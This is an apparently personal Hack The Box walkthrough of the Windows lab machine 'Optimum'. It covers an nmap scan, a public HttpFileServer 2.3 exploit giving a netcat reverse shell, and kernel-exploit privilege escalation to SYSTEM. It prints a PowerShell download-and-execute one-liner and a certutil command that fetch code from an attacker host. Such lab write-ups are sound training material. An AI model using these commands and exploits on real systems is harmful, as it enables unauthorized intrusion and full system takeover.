# Hackthebox - Optimum

* Windows

![Optimum](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-124ce844fcf256f001ca00cb1b68c00605937d3f%2FHTB-Optimum.png?alt=media)

* [Box on HTB](https://app.hackthebox.com/machines/6)

## Nmap

```bash
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.10.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 19:50 EDT
Nmap scan report for 10.10.10.8
Host is up (0.022s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds
```

## Port 80

* We have an HttpFile Server\
  ![httpFileServer](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-dda8a7b2e4ec92539a98ed5460fa0d074500d065%2F2022-09-10-19-57-47.png?alt=media)
* If we google it we find [this exploit](https://www.exploit-db.com/exploits/39161) right away
* We have to get nc.exe in our attacking machine. Kali has binaries hosted so we can just copy and paste it in our working dir like this `cp /usr/share/windows-resources/binaries/nc.exe .`
* We have to serve netcat using python http server `python3 -m http.server 80`
* Then we have to modify the script and add our ip address and our port (I left 443)
* We set a listener `rlwrap nc -lvp 443`
* We launch our exploit `python2 39161 10.10.10.8 80`
* And we get a shell\
  ![shell](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-e9408b88a499965edbf8a1d8add64cec3fb80d25%2F2022-09-10-20-20-16.png?alt=media)
* We can grab the user flag\
  ![user flag](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-2c8313d2564b3e118e786510793234f8586dd861%2F2022-09-10-20-21-25.png?alt=media)

## Privesc

* Win version

![win version](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-0f47e34e33c3010361c908b54d33f69ae5d7405f%2F2022-09-10-20-31-23.png?alt=media)

### Kernel exploits

* `echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -`

![Local privesc](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-cde44af431a71304862d46dacdca8b70966087d9%2F2022-09-10-21-53-34.png?alt=media)

* Let's find another exploit than the one mentioned in Sherlock (does not work) `searchsploit ms16-032`

![searchsploit](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-ed0be46eb264ebe051f2d093751a47f3835e0c73%2F2022-09-10-21-58-36.png?alt=media)

* Tried a few exploits but none worked
* On google I found [this](https://www.exploit-db.com/exploits/41020)
* And in the comment they mention [this exe file](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe)
* We download it in our kali
* Serve it with python
* `certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe` get it in our target
* We launch it we get a system shell

![system](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-953d132dbd3f734d3a66c6949c3a6a944fc2c2b4%2F2022-09-10-22-09-03.png?alt=media)

* We can grab the root flag

![root](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-1cab3d19947fec7982ffbdd1cce4f525497102ee%2F2022-09-10-22-10-05.png?alt=media)